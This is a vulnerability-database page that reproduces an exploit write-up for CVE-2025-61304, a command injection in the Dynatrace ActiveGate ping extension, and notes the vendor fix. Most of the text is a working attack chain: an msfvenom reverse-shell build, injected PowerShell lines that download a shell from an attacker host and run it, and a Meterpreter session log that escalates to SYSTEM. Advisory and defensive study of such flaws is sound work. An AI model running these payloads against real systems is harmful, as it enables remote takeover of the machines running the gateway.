Vulners
Lucene search
📄 Dynatrace ActiveGate Command Injection
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Exploit for CVE-2025-61304 | 25 Oct 202512:42 | – | githubexploit |
 | CVE-2025-61304 | 25 Oct 202510:42 | – | circl |
 | Dynatrace ActiveGate 安全漏洞 | 5 Nov 202500:00 | – | cnnvd |
 | CVE-2025-61304 | 5 Nov 202500:00 | – | cve |
 | CVE-2025-61304 | 5 Nov 202500:00 | – | cvelist |
 | EUVD-2025-37901 | 5 Nov 202500:00 | – | euvd |
 | CVE-2025-61304 | 5 Nov 202516:15 | – | nvd |
 | CVE-2025-61304 | 5 Nov 202516:15 | – | osv |
 | PT-2025-45113 | 5 Nov 202500:00 | – | ptsecurity |
 | CVE-2025-61304 | 6 Nov 202500:10 | – | redhatcve |
10
# CVE-2025-61304
"OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address"
In the background the ping extension is using the command prompt of Windows to perform the ping. The input field for the Test Target Host is also 1024 chars long. After the ip-address you can write additional commands for the ActiveGate to execute, simply by using an '&'.
Reported to Dynatrace and fixed with this commit:
https://github.com/Dynatrace/dynatrace-api/pull/99
Exploit RCE to add user:
<img width="1261" height="957" alt="add_user" src="https://github.com/user-attachments/assets/acbfdc73-fe90-4c29-b106-70a283695230" />
Local user list before and after:
<img width="1274" height="746" alt="exploit" src="https://github.com/user-attachments/assets/344948ae-08d6-431c-9101-aa0be2633998" />
# Other example payloads:
1. Create a meterpreter reverse shell:
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
```
2. Download and Execute the shell on the ActiveGate through the Cloud interface using the ping extension:
```
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe
google&c:\test\mshell.exe
```
3. Resulting session
```
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.51.200:4444
[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-9493M3CRTDV
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
```Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2025 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
EPSS0.00927
SSVC